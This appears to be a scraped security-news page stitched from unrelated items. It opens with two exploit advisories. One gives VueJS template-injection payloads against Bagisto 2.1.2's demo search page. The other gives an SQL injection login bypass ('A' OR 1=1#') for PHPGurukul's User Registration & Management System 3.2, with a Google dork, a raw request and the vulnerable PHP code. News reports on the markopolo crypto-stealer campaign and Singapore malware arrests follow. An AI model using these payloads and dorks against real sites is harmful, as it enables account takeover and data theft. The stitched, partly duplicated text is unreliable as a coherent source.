    # Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)# Date: 06/18/2024# Exploit Author: tmrswrr# Vendor Homepage: https://forums.bagisto.com/# Version: 2.1.2# Tested on: https://demo.bagisto.com/https://demo.bagisto.com/bagisto-common/search?query={{7*7}}49https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}Ahttps://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]> Payloads for VueJS 3https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}> You will be see alert button

Bagisto 2.1.2 Client-Side Template Injection

User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System - SQLi.:. Google Dorks .:.inurl:loginsystem/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://phpgurukul.com/.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."===========================================================================================Vulnerability 1: Unauthenticated SQL Injection & Authentication bypassTypes: error-basedFile: localhost/admin/index.phpVul Parameter: USERNAME [POST]POST PoC #1: http://tom:8080/loginsystem/admin/index.phpHost: tomUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://tomConnection: keep-aliveReferer: http://tom/loginsystem/admin/index.phpCookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2aUpgrade-Insecure-Requests: 1username='&password=test&login=Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9===========================================================================================Test #2 => Payload to skip authenticationhttp://localhost:9000/loginsystem/admin/index.phpusername=A' OR 1=1#&password=1&login=Response:302 redirect to dashboard.php===========================================================================================Vuln File:/loginsystem/admin/index.phpVul Code:<?php session_start();include_once('../includes/config.php');// Code for loginif(isset($_POST['login'])){$adminusername=$_POST['username'];$pass=md5($_POST['password']);$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");$num=mysqli_fetch_array($ret);if($num>0)

User Registration And Management System 3.2 SQL Injection

A threat actor who goes by alias markopolo has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware and carries out cryptocurrency theft.
The attack chains involve the use of a purported virtual meeting software named Vortax (and 23 other apps) that are used as a conduit to deliver Rhadamanthys, StealC,

Cybercrime / Cryptocurrency

A threat actor who goes by alias **markopolo** has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware and carries out cryptocurrency theft.

The attack chains involve the use of a purported virtual meeting software named Vortax (and 23 other apps) that are used as a conduit to deliver Rhadamanthys, StealC, and Atomic macOS Stealer (AMOS), Recorded Future's Insikt Group said in an analysis published this week.

"This campaign, primarily targeting cryptocurrency users, marks a significant rise in macOS security threats and reveals an expansive network of malicious applications," the cybersecurity company noted, describing markopolo as "agile, adaptable, and versatile."

There is evidence connecting the Vortax campaign to prior activity that leveraged trap phishing techniques to target macOS and Windows users via Web3 gaming lures.

A crucial aspect of the malicious operation is its attempt to legitimize Vortax on social media and the internet, with the actors maintaining a dedicated Medium blog filled with suspected AI-generated articles as well as a verified account on X (formerly Twitter) carrying a gold checkmark.

Downloading the booby-trapped application requires victims to provide a RoomID, a unique identifier to a meeting invitation that's propagated via replies to the Vortax account, direct messages, and cryptocurrency-related Discord and Telegram channels.

Once a user enters the necessary Room ID on the Vortax website, they are redirected to a Dropbox link or an external website that stages an installer for the software, which ultimately leads to the deployment of the stealer malware.

"The threat actor that operates this campaign, identified as markopolo, leverages shared hosting and C2 infrastructure for all of the builds," Recorded Future said.

"This suggests that the threat actor relies on convenience to enable an agile campaign, quickly abandoning scams once they are detected or producing diminishing returns, and pivoting to new lures."

The findings show that the pervasive threat of infostealer malware cannot be overlooked, especially in light of the recent campaign targeting Snowflake.

The development comes as Enea revealed SMS scammers' abuse of cloud storage services like Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage to trick users into clicking on bogus links that direct to phishing landing pages that siphon customer data.

"Cybercriminals have now found a way to exploit the facility provided by cloud storage to host static websites (typically .HTML files) containing embedded spam URLs in their source code," security researcher Manoj Kumar said.

"The URL linking to the cloud storage is distributed via text messages, which appear to be authentic and can therefore bypass firewall restrictions. When mobile users click on these links, which contain well-known cloud platform domains, they are directed to the static website stored in the storage bucket."

In the final stage, the website automatically redirects users to the embedded spam URLs or dynamically generated URLs using JavaScript and deceives them into parting with personal and financial information.

"Since the main domain of the URL contains, for example, the genuine Google Cloud Storage URL/domain, it is challenging to catch it through normal URL scanning," Kumar said. "Detecting and blocking URLs of this nature presents an ongoing challenge due to their association with legitimate domains belonging to reputable or prominent companies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: Markopolo's Scam Targeting Crypto Users via Fake Meeting Software

Cops decimate cybercrime infrastructure used to steal data from nearly 2,000 people in Singapore last year.

Source: dpa picture alliance via Alamy

Singapore police scored a win with the arrests of two men accused of operating servers that enabled cybercrimes against Singaporeans and the dismantling of their supporting infrastructure.

In 2023, nearly 2,000 victims in Singapore downloaded malicious Android applications that allowed the scammers to steal device data, including bank information, according to a statement from the Singapore police.

Following a deep analysis of the malware by cybersecurity officials in Singapore, Hong Kong, and Malaysia, where the arrests were made, police were able to track the entire organization behind the attacks, including a syndicate accused of operating a fraudulent customer service center in Taiwan.

"In addition, the HKPF (Hong Kong Police Force) successfully took down 52 malware-controlling servers in Hong Kong and arrested 14 money mules who had allegedly facilitated the malware-enabled scam cases by relinquishing the use of their bank accounts to the scammers for monetary reward," the Singapore police added.

The two arrests included a 26-year-old man who faces up to seven years in prison. The other, a 47-year-old man, will stand trial for the same crimes, plus an additional charge carrying up to 10 years in prison, police said.

**About the Author(s)**

Tag

#auth